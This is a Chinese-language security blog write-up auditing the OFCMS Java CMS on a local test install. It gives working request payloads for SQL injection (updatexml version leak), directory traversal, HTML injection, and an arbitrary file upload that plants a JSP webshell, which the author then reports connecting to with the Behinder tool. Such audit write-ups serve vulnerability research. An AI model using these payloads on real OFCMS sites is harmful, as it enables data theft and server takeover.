OFCMS代码审计

环境搭建

https://blog.csdn.net/oufua/article/details/82584637

安装后是重启容器

最后
db-config.properties 改成db.properties 修改数据库连接

搭建成功

代码审计

sql注入审计

全局搜索${ 查看没有预编译的sql语句，从而找到sql注入功能点

Ctrl+alt+h 查看函数的调用栈

寻找到一处没有进行任何处理的sql语句

    public void create() {
      try {
         String sql = getPara("sql");
         Db.update(sql);
         rendSuccessJson();
      } catch (Exception e) {
         e.printStackTrace();
         rendFailedJson(ErrorCode.get("9999"), e.getMessage());
      }
   }
}

getPara(“sql”) 后直接交给Db.update(sql)执行

下断点测试一下

利用

请求包
http://localhost:8080/ofcms_admin_war/admin/system/generate/create?sql=UPDATE%20of_cms_api%20SET%20api_url=updatexml(2,concat(0x7e,(version())),0)

响应包
{“msg”:“java.sql.SQLException: XPATH syntax error: ‘~5.7.26’”,“code”:“处理失败请稍后重试!”,“success”:false}

HTML注入

http://localhost:8080/ofcms_admin_war/admin/comn/service/update.json?sqlid=system.task.update

payload

<h2>aaaa</h2>

保存和查询输出并未过滤，可能前端有限制js，需要绕一些前端应该会存在xss

目录穿越漏洞

保存模板的地方存在传入参数dir
全局搜索dir

关键代码

public void getTemplates() {
    //当前目录
    String dirName = getPara("dir","");
    //上级目录
    String upDirName = getPara("up_dir","/");
    //类型区分
        String resPath = getPara("res_path");
    //文件目录
    String dir = null;
    if(!"/".equals(upDirName)){
          dir = upDirName+dirName;
    }else{
          dir = dirName;
    }
    File pathFile = null;
    if("res".equals(resPath)){
        pathFile = new File(SystemUtile.getSiteTemplateResourcePath(),dir);
    }else {
        pathFile = new File(SystemUtile.getSiteTemplatePath(),dir);
    }

传入的路径没有过滤直接使用

利用

http://localhost:8080/ofcms_admin_war/admin/cms/template/getTemplates.html?dir=…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/

任意文件上传

在查看调用栈的时候发现了save保存文件的接口只过滤了<>

使用url编码上传木马测试
任意文件上传

关键代码

public void save() {
    String resPath = getPara("res_path");
    File pathFile = null;
    if("res".equals(resPath)){
        pathFile = new File(SystemUtile.getSiteTemplateResourcePath());
    }else {
        pathFile = new File(SystemUtile.getSiteTemplatePath());
    }
    String dirName = getPara("dirs");
    if (dirName != null) {
        pathFile = new File(pathFile, dirName);
    }
    String fileName = getPara("file_name");
    // 没有用getPara原因是，getPara因为安全问题会过滤某些html元素。
    String fileContent = getRequest().getParameter("file_content");
    fileContent = fileContent.replace("&lt;", "<").replace("&gt;", ">");
    File file = new File(pathFile, fileName);
    FileUtils.writeString(file, fileContent);
    rendSuccessJson();
}

接下来要尝试构造参数
filen_name res_path=res

dir=/ file_content 就可以任意文件上传了

利用

可以上传jsp文件
参数：
file_path=&dirs=%2F&res_path=res&file_name=shell.jsp&file_content=aaaaaaa

写入成功

由于MVC问题，无法正常访问到所有找一个静态路径试一下。

写入到静态页面static目录下，也就是…/…/static/目录下

写入成功

成功访问到，接下getshell试一下。

接下来上传冰蝎的马连一下

成功上线

框架漏洞

Fastjson反序列化

学习中，全局搜索危险函数并未发现可控的功能点

Log4j代码审计

参考：http://www.hackdig.com/06/hack-1021138.htm

判断一个网站系统是否存在log4j远程命令执行漏洞需要判断一下几个条件：
1、 是否使用了存在漏洞版本的log4j组件
2、是否使用类似这种危险函数：logger.debug ,logger.info ,logger.warn , logger.error ,logger.fatal
3、函数内的参数值是否用户可控

发现危险性函数，看看参数是不是可以控制

部分代码

    while (!stopRequested) {
      log.info("##### 自动更新配置文件服务启动, 更新间隔时间 " + interval + " 秒");
      // 去除 Engine 中的缓存，以免 get 出来后重新判断 isModified
      sqlKit.getEngine().removeAllTemplateCache();
      sqlKit.parseSqlTemplate();
      try {
         sleep(interval * 1000);
      } catch (InterruptedException e) {
         runThread.interrupt();
      }
   }
   log.info("##### 自动更新配置文件服务退出");
}

发现是固定参数用户不可控

未完待续，继续学习。

参考文章

环境搭建：
https://blog.csdn.net/oufua/article/details/82584637

Log4j代码审计
http://www.hackdig.com/06/hack-1021138.htm

说明

仅作为安全研究使用，请勿使用未授权的攻击行为，遵循法律法规。